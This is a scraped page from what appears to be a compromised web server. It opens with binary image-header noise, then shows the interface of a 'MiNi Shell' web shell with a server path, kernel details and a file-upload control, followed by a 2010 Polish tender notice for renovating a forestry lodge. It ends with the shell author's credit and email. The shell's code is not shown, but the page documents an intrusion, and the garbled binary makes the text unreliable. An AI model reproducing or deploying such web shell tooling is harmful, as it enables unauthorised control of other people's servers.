JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/189531-N-2010.html

<p class="kh_header"><b>Miętne: Remont budynku mieszkalnego leśniczówka Życzyn, Gmina Trojanów.</b><br>
<b>Numer ogłoszenia: 189531 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Garwolin , Miętne, ul. Główna 3, 08-400 Miętne, woj. mazowieckie, tel. 025 6841140, faks 025 6841159.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku mieszkalnego leśniczówka Życzyn, Gmina Trojanów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont będzie obejmował następujące rodzaje robót.
I.	Roboty budowlane
1.	Ocieplenie ścian zewnętrznych styropianem 12 cm + tynk akrylowy na siatkę 
            z włókna szklanego - 198,95m2
2.	Tynk mozaikowy na cokole budynku na styropianie grubości 12 cm i siatce 
            z włókna szklanego - 48m2
3.	Wykonanie schodów wejściowych żelbetonowych - 6,92m2
4.	Zbrojenie schodów stalą o średnicy 10 mm - 0,035t
5.	Zamontowanie barierki stalowej na schodach 16mb wys. 110cm
6.	Obłożenie schodów wejściowych terakotą mrozoodporną antypoślizgową na klej 
             z cokołami - 28,20m2
7.	Rozebranie ścianki murowanej z cegły grubości 25cm - 0,5m3
8.	Rozebranie starych rynien z blachy - 23mb
9.	Rozebranie starych osłon przeciw śniegowych - 9,20mb
10.	Zamontowanie nowych osłon z płotków stalowych - 23 mb
11.	Rozbiórka komina wolnostojącego z cegły na dachu - 1,26m3
12.	Wykonanie nowego komina z cegły klinkierowej - 1,26m3
13.	Wykonanie rusztowania przy kominie 1szt.
14.	Wykonanie nakrywy żelbetonowej na kominie grubości 7cm - 0,9m2
15.	Wykonanie konstrukcji drewnianej heblowanej zadaszenia nad wejściem,
                          - słupy        10x10 - 0,14m3
              - płatwie      10x2 - 0,148m3
	  - krokwie  7,5x12 - 0,189m3

16.	Łacenie połaci dachowej pod pokrycie z blachy dachówko podobnej - 19,84m2
17.	Pokrycie dachu blachą trapezową T-25 nad wejściem do budynku - 19.84 m2
18.	Obróbki blacharskie pokrycia dachowego z blachy płaskiej powlekanej - 4,08m2
19.	Obróbka blacharska komina wolnostojącego 2,64m2
20.	Montaż uchwytów stalowych z kształtowników jako wsporniki okapu dachowego
           23mb - 26 szt.
21.	Zamocowanie deski czołowej impregnowanej pod okapem pod umocowanie 
            rynny PCV 24 mb
22.	Obróbka blacharska pasa podrynnowego i nadrynnowego z blachy powlekanej 
            płaskiej w kolorze pokrycia - 19,92m2
23.	Rynny dachowe półokrągłe śred. 12,5 cm typ Kaczmarek na uchwytach PCV 
           24mb
            - denko 4 szt.
            - wpust 4 szt.
24.	Rura spustowa z PCV średnicy 12,5cm typ Kaczmarek na uchwytach PCV 18mb
            - kolana 12 szt.
25.	Rozbiórka podłóg drewnianych z desek na wpust z legarami - 82,06m2
26.	Rozbiórka posadzki betonowej nie zbrojonej - 1,43m3
27.	Rozbiórka wykładziny ściennej z płytek glazurowych - 15,20m2
28.	Licowanie ścian płytek glazurowych - 47,48m2
29.	Ułożenie terakoty na klej - 38m2
30.	Podkład betonowy grubości 8cm na podłożu gruntowym - 7,08m3
31.	Izolacja pozioma z folii szerokiej dwukrotnie - 88,57m2
32.	Ocieplenie posadzek grubości 5cm ze styropianu M-20 -  88,57m2
33.	Podkład pod posadzkę grubości 5cm - 88,57m2 z betonu
34.	Ułożenie podłogi białej z desek sosnowych 32mm - 101,57m2
35.	Cokoły przyścienne wys. 7,5 (cm lub m) mocowane do ściany + ćwierćwałek 
            -101,57mb
36.	Lakierowanie lakierem bezbarwnym podłóg z desek: podkład + 2x lakier 
            nawierzchniowy m2=101,57
37.	Cyklinowanie podłóg drewnianych nowych - 101,57m2
38.	Wyrównanie tynków wewnętrznych zaprawą cementowo-wapienną pod
            nawierzchnię ze szpachli gipsowej 275,72m2
39.	Gładź gipsowa dwuwarstwowa na tynku ze szlifowaniem na sufitach - 89,16m2
40.	jw. lecz na ścianach z tynku - 275,72m2
41.	Malowanie emulsyjne dwukrotne tynków wewnętrznych w kolorze białej gładzi 
           gipsowej - 364,88m2
42.	Zamontowanie nowych parapetów z kompozytu szer. 30cm dł. ponad 1m - 6szt
43.	Wykonanie opaski wokół budynku z kostki brukowej na betonie szer. 80cm grub.
            kostki 6cm z obrzeżem trawnikowym; kostka - 36,96m2, obrzeże - 46,20mb
44.	Podbudowa betonowa bez dylatacji grubości 10cm - 36,96m2
45.	Rowki pod obrzeże trawnikowe 20x20cm - 83mb
46.	Obrzeże betonowe 20x6 na podsypce cementowo-piaskowej - 83mb
47.	Podbudowa betonowa grubości 10 cm pod chodnik z kostki brukowej - wejście 
           do budynku szer. 1m - 62,5m2
48.	Rowki pod obrzeże trawnikowe o wym. 20x20cm - 85mb
49.	Obrzeże betonowe o wym. 30x6cm na podsypce cementowo-piaskowej - 85mb
50.	Chodnik z kostki brukowej grubości 6cm na podsypce piaskowej - 62,5m2
51.	Naprawa główna trzonu kuchennego licowanego kaflami 1 szt.
52.	Zamontowanie przykrywy z włazem o średnicy 60 cm typ lekki w studzience
             rewizyjnej średnicy 800cm - 1 komplet
53.	Zamontowanie przykryw żelbetonowych studzienek osadowych ścieków 
            (2 studnie śr. 1250 mm) z włazami żeliwnymi
54.	Zamontowanie nowych drzwi wejściowych z ościeżnicami 80x200cm - szt. 9, 
            70x200 cm - szt. 2 : 17,20m2
55.	Ościeżnice drewniane wewnętrzne 55mb - 11szt. 
56.	Zamontowanie parapetów z kompozytu do 1m dł. i szer. 30cm - 3szt.
57.	Rusztowanie stalowe do wykonania tynków wys. do 7 m - 203,6 m2
58.	Wyłożenie okapu zewnętrznego wykładziną sidingową w kolorze brąz o szer. 
           80cm m2=16,8
II.	Roboty instalacyjne
1.	Demontaż wanny stalowej szt. 1
2.	Demontaż miski ustępowej szt. 1
3.	Demontaż umywalki fajansowej szt. 1
4.	Demontaż zlewozmywaka żeliwnego szt. 1
5.	Demontaż starego rurociągu stalowego średnicy 20 - 25mb
6.	Montaż nowego rurociągu stalowego ocynkowanego średnicy 20 - 15mb
7.	Montaż nowego rurociągu stalowego ocynkowanego średnicy 25 - 10mb
8.	Montaż nowego rurociągu stalowego ocynkowanego średnicy 15 - 30mb
9.	Montaż nowego rurociągu stalowego ocynkowanego średnicy 32 - 13mb
10.	Montaż kabiny natryskowej z obudową 1 komplet
11.	Montaż brodzika natryskowego stalowego 1 komplet + syfon
12.	Montaż ubikacji typu KOMPAKT komplet 1 
13.	Montaż umywalki fajansowej 50x40 komplet 1 + syfon
14.	Montaż zlewozmywaka dwukomorowego stalowego nierdzewnego komplet 1
           + syfon
15.	Montaż baterii umywalkowej stojącej komplet 1
16.	Montaż baterii zlewozmywakowej komplet 1
17.	Montaż baterii natryskowej ściennej komplet 1
18.	Montaż zaworów umywalkowych i zlewozmywakowych szt. 6
19.	Wykonanie rurociągu kanalizacyjnego PCV średnicy 110 - 10mb
20.	Wykonanie rurociągu kanalizacyjnego PCV średnicy 50 - 20 mb
21.	Podejście odpływowe średnicy 110  szt. 2
22.	Podejście odpływowe średnicy 50 szt. 5
23.	Demontaż starego rurociągu żeliwnego średnicy 110 i 50 - 25mb
24.	Wymiana wężownicy do podgrzewania ciepłej wody szt. 1
25.	Wykucie bruzd pod instalację wodociągową 35mb
26.	Przebicie otworów w cegle grubości 1 cegły szt. 10
27.	Przebicie otworów w stropach betonowych szt. 8
28.	Wyłożenie okopu zewnętrznego wykładziną sidingową w kolorze brąz o szer. 
           80cm m2=16,8
III.	Roboty elektryczne
1.	Wymiana wyłączników podtynkowych szt. 12 
2.	Wymiana gniazd podtynkowych szt. 15 
3.	Wymiana przewodów podtynkowych 25mb
4.	Zamontowanie instalacji odgromowej po wykonaniu tynków zewnętrznych, 
            zwody pionowe szt. 4
5.	Montaż lamp zewnętrznych na ścianach budynku i przed wejściem do budynku
            + klosze i żarówki szt. 2
6.	Instalacja odgromowa kominów szt. 2
7.	Wymiana tablicy rozdzielczej wewnętrznej z bezpiecznikami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3 000.00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Do wykazu winno być dołączone oświadczenie stwierdzające, iż wskazane w załączniku nr 1 osoby posiadają wymagane uprawnienia zgodnie z rozporządzeniem Ministra Transportu 
i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (DZ.U.2006 Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz  że  przynależą do właściwej izby samorządu zawodowego.
Wykonawca ma wykazać, że wykonał co najmniej trzy roboty budowlane 
o wartości co najmniej 100000 zł każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: dysponuje kierownikiem budowy posiadającym uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności budownictwo ogólne. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://garwolin.warszawa.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziby zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 10:00, miejsce: siedziba zamawiajacego  pok. nr 10 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com